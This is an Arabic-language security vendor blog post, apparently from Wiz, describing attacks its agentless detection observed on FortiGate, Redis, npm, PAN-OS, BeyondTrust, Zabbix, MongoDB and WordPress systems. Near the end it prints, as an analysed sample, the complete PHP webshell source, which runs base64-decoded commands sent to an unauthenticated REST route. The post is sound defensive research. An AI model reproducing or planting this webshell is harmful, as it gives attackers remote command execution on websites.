تلعب الأجهزة الافتراضية دورًا حاسمًا في الشبكات السحابية، حيث توفر خدمات مثل جدران الحماية والبوابات الآمنة واتصال VPN. ومع ذلك، نظرًا لأنها تعمل كـ “صناديق سوداء” لا تدعم عملاء EDR التقليديين، فقد شكلت تاريخيًا فجوة كبيرة في رؤية الفرق الأمنية. على مدى الأشهر الماضية، غيّرت ميزة اكتشاف عبء العمل بدون وكيل من Wiz هذا النمط بشكل أساسي. فهي لا توفر رؤية مهمة للأجهزة الافتراضية فحسب، بل إنها توفر أيضًا لفرق البحث وفرق الأشعة تحت الحمراء لدينا السياق اللازم للتحقيق في النشاط المرتبط بجهات التهديد البارزة.. وهذا يسمح لنا باكتشاف وتحليل مجموعة واسعة من الهجمات المتطورة، كل ذلك دون الحاجة إلى وكلاء.
في منشور المدونة هذا، سنعرض لك مجموعة فرعية من القيمة الفريدة التي أطلقتها هذه الإمكانية الجديدة، عبر مجموعة واسعة من التهديدات والتقنيات المستهدفة.
مسار حملة FortiGate
تعد أجهزة FortiGate أهدافًا عالية القيمة لأنها غالبًا ما تكون متصلة بالإنترنت وتعمل كبوابات موثوقة بين الشبكات الخارجية والداخلية. لقد سمح لنا نهجنا غير الوكيل بتتبع العديد من أنماط الاستغلال المهمة خلال الأشهر الماضية:
-
CVE-2026-24858 استغلال: لقد لاحظنا أن المهاجمين يستغلون يوم الصفر هذا لإنشاء حسابات مستخدمين متميزين محليين وتعديل الإعدادات المختلفة، مما يتيح الحركة الجانبية وإحداث تأثير أكبر.
-
حشو بيانات الاعتماد وFortiBleed: لقد اكتشفنا حملات منسقة لحشو بيانات الاعتماد تستفيد من شبكات الروبوت لاستهداف لوحات الإدارة المكشوفة. يتماشى هذا مع حملة FortiBleed الأوسع، والتي أدت إلى اختراق ما يقرب من 75000 جهاز على مستوى العالم.
-
سرقة التكوين: تم القبض على المهاجمين وهم يقومون بتنزيل تكوينات الجهاز بالكامل. نظرًا لأن FortiOS يستخدم تشفيرًا عكسيًا لبيانات الاعتماد المخزنة، فقد سمحت هذه التكوينات المسروقة للجهات الفاعلة بفك تشفير حسابات خدمة LDAP ومفاتيح VPN المشتركة مسبقًا لتسهيل الحركة الجانبية.
Redis: ما وراء وظائف Cron البسيطة
على الرغم من أن Redis آمن افتراضيًا عند تكوينه بشكل صحيح، إلا أن عمليات النشر المكشوفة أو التي تم تكوينها بشكل خاطئ لا تزال مستهدفة بشكل متكرر في البيئات السحابية. تظل معظم محاولات الاستغلال مدفوعة في المقام الأول بالربح، وتحديدًا عبر التعدين الخفي. من خلال مراقبة سجلات Redis بدون وكيل، نجحنا في اكتشاف مهاجمين من العالم الحقيقي يسيئون استخدام هذه المثيلات في الواقع.
-
لقد لاحظنا العديد من الحالات التي يسيء فيها المهاجمون استخدام أساليب مثل إساءة استخدام النسخ المتماثل (باستخدام
REPLICAOF) لاستهداف أجهزة Redis. في هجمات النسخ المتماثل، يخدع الممثلون هدفًا للمزامنة مع خادم ضار لإدخال وحدات كائنات مشتركة لتنفيذ التعليمات البرمجية عن بُعد.
لا تقتصر هذه القدرة بدون وكيل على صيد التهديدات. لدينا أيضًا العديد من قواعد اكتشاف التهديدات المصممة لاكتشاف هذه الهجمات المحددة، بما في ذلك: Redis suspicious replication target configured, Redis module loaded from unusual path و Attack Detected and Prevented by Redis
أمن سلسلة التوريد: اكتشاف حزم npm الضارة
أصبحت هجمات سلسلة التوريد، وخاصة تلك التي تنطوي على حزم npm المخترقة، تشكل تهديدًا خطيرًا لأمن التطبيقات الحديثة. يعد اكتشاف أنماط التثبيت الدقيقة والتي غالبًا ما تبدو مشروعة أمرًا ضروريًا. لقد نجحنا في استخدام Agentless EDR لمراقبة وتحديد استغلال تبعيات npm في الوقت الفعلي. على سبيل المثال، سجل تحليلنا سجلات التثبيت للإصدارات الضارة من @asyncapi/specs، مما يسلط الضوء على القدرة على تتبع جلب الحزمة.
من خلال استيعاب هذه السجلات بدون وكيل، يمكننا ربط نشاط الحزمة بسلوك عبء العمل الأوسع، مما يوفر رؤية لتهديدات سلسلة التوريد دون الحاجة إلى وكلاء في كل عقدة.
نقاط الضعف الحرجة على نطاق واسع: PAN-OS وBeyondTrust
تميز العام الماضي بنقاط ضعف RCE رفيعة المستوى في الأجهزة الافتراضية. بالإضافة إلى حملات FortiGate، شهدنا أيضًا هجمات ضد:
-
عموم نظام التشغيل: لاحظنا قيام الممثلين بتسجيل الدخول بنجاح إلى حسابات المسؤول عبر CVE-2026-0257 في بوابة PAN-OS VPN. وفي حالة أخرى، حدد فريق البحث لدينا ارتفاعًا كبيرًا في حركة المرور إلى عنوان URI الخاص بـ CaptivePortal بعد أيام قليلة فقط من الكشف عن CVE-2026-0300، مما يؤكد اتجاه الاستغلال.
-
الدعم عن بعد BeyondTrust (CVE-2026-1731): هذه ثغرة أمنية حرجة في تنفيذ التعليمات البرمجية عن بعد (RCE) قبل المصادقة، وتؤثر على برنامج BeyondTrust Remote Support (RS) وبرنامج الوصول عن بعد المميز (PRA) مع درجة CVSS قصوى تبلغ 9.9. لقد لاحظنا استغلالًا ناجحًا لهذه الأجهزة بشكل عام، مستهدفًا على وجه التحديد تنفيذ الأوامر الإدارية غير المصادق عليها.
دراسة الحالة: واجهة برمجة تطبيقات Zabbix وبيانات الاعتماد الافتراضية
يوفر Agentless EDR أيضًا رؤية واسعة النطاق لنقاط نهاية HTTP وHTTPS، مما يتيح لنا اكتشاف النشاط غير المعتاد على الجهاز وربطه بنتائج Wiz ASM أو الأنشطة السحابية الأخرى.
في إحدى الحالات التي حققنا فيها هذا العام، بدأ التحقيق مع Access To Unusual Executable File With HTTP GET And Query Params كشف. قادنا هذا إلى تحديد مثيل Zabbix الذي يعمل من مسار غير عادي باستخدام بيانات الاعتماد الافتراضية، مما سمح بتنفيذ تعليمات برمجية عشوائية على الجهاز. يعد هذا النوع من الوصول خطيرًا بشكل خاص لأن Zabbix يدير المضيفين. باستخدام الأذونات الإدارية، يمكن للمهاجم إنشاء مشغلات مخصصة تنفذ أوامر عشوائية عبر المثيلات المُدارة، مما يحول أداة المراقبة إلى آلية حركة جانبية قوية.
CopyFail: استغلال ذاكرة التخزين المؤقت لصفحة Linux
شهدت الأشهر القليلة الماضية العديد من الثغرات الأمنية في Linux LPE، بدءًا من CopyFail. في هذه الحالة، ساعد Agentless EDR في تحديد نشاط عبء العمل ذي الصلة والذي كان متوافقًا مع الاستغلال الناجح باستخدام إحدى التقنيات المنشورة. يمكن لمستخدمي Wiz عرض الاكتشاف هنا.
MongoBleed: معالجة التعرض لبيانات الذاكرة فقط
تعد MongoBleed، التي يتم تتبعها بالرقم CVE-2025-14847، ثغرة أمنية حرجة لتسرب الذاكرة غير المصادق عليها في MongoDB Server. تؤثر الثغرة الأمنية على معالجة MongoDB لرسائل الشبكة المضغوطة بـ zlib، مما يسمح للمهاجمين عن بعد باستخراج البيانات الحساسة مباشرة من ذاكرة الخادم دون بيانات اعتماد صالحة.
وبعد الكشف عنه، تم استغلال MongoBleed في البرية على الفور تقريبًا. ساعدتنا الرؤية بدون وكيل في تحديد نشاط MongoDB المرتبط بمحاولات الاستغلال في العالم الحقيقي وتنبيه العملاء في الوقت الفعلي.
WordPress: يتم نشر Webshell عبر wp2shell
بالإضافة إلى هذه الأمثلة، توفر سجلات الوصول إلى HTTP رؤية مهمة لمجموعة واسعة من نواقل الهجوم. يمكنهم المساعدة في تحديد التهديدات التي تستهدف خادم الويب الأساسي والتطبيقات التي يستضيفها. على سبيل المثال، قد تكشف سجلات الوصول من Nginx أو Apache أو IIS عن محاولات استغلال ضد الخادم نفسه، بالإضافة إلى الهجمات التي تستهدف التطبيقات والأنظمة الأساسية المستضافة مثل WordPress.
باستخدام أحداث Agentless Workload، اكتشفنا مؤخرًا وجود webshell تم نشره على مثيل WordPress من خلال استغلال ثغرات wp2shell.
البرنامج الضار عبارة عن PHP webshell يسجل نقطة نهاية REST API مخصصة (/morning/v1/{redacted}) مع رد اتصال متساهل ('__return_true')، مما يسمح للمهاجمين بإرسال طلبات POST تحتوي على أمر مشفر بـ base64. يقوم البرنامج المساعد بفك تشفير هذا الأمر وتنفيذه، مما يؤدي إلى إرجاع الإخراج ضمن استجابة JSON.
<?php
add_action('rest_api_init', function () {
register_rest_route('morning/v1', '/{redacted}', array(
'methods' => 'POST',
'permission_callback' => '__return_true',
'callback' => function ($request) {
ob_start();
passthru(base64_decode($request->get_param('c')) . ' 2>&1');
$output = ob_get_clean();
require_once ABSPATH . 'wp-admin/includes/plugin.php';
return new WP_REST_Response(array(
'marker' => '{redacted}',
'output' => $output,
));
},
));
});
اتخذ الإجراء: أطلق العنان للرؤية بدون وكيل
يقوم اكتشاف عبء العمل بدون وكيل بما هو أكثر من مجرد الكشف عن النقاط العمياء – فهو يوفر القياس عن بعد الدقيق وعميق المستوى المطلوب للدفاع الحديث. بفضل هذه الرؤية، يمكنك الآن إنشاء قواعد عالية الدقة للكشف عن التهديدات (TDRs) التي تؤدي إلى أنماط استغلال في العالم الحقيقي. قم بتمكين الميزة في إعداداتك اليوم لتحويل السجلات الأولية إلى معلومات أمنية قابلة للتنفيذ.
-
قم بتمكين اكتشاف عبء العمل بدون وكيل من خلال مركز المعاينة.
-
تأكد من تمكين استيعاب سجل العمل/الجهاز في إعدادات إدارة الأحداث.
-
لضمان جمع سجلات Fortigate، تأكد من تمكين فحص القرص الذي لا يعمل بنظام التشغيل.
لم تعد الأجهزة الافتراضية نقطة عمياء. من خلال جمع السجلات المحلية تلقائيًا دون تحمل تكاليف النشر، يوفر Agentless Workload Detection السياق اللازم لتتبع سلسلة القتل السحابية الكاملة. بدءًا من الاستغلال الفوري لجدران الحماية وحتى واجهات برمجة التطبيقات لقاعدة البيانات التي تم تكوينها بشكل خاطئ، تمكن هذه الرؤية الباحثين من التحقيق في النشاط بمزيد من العمق والدقة.
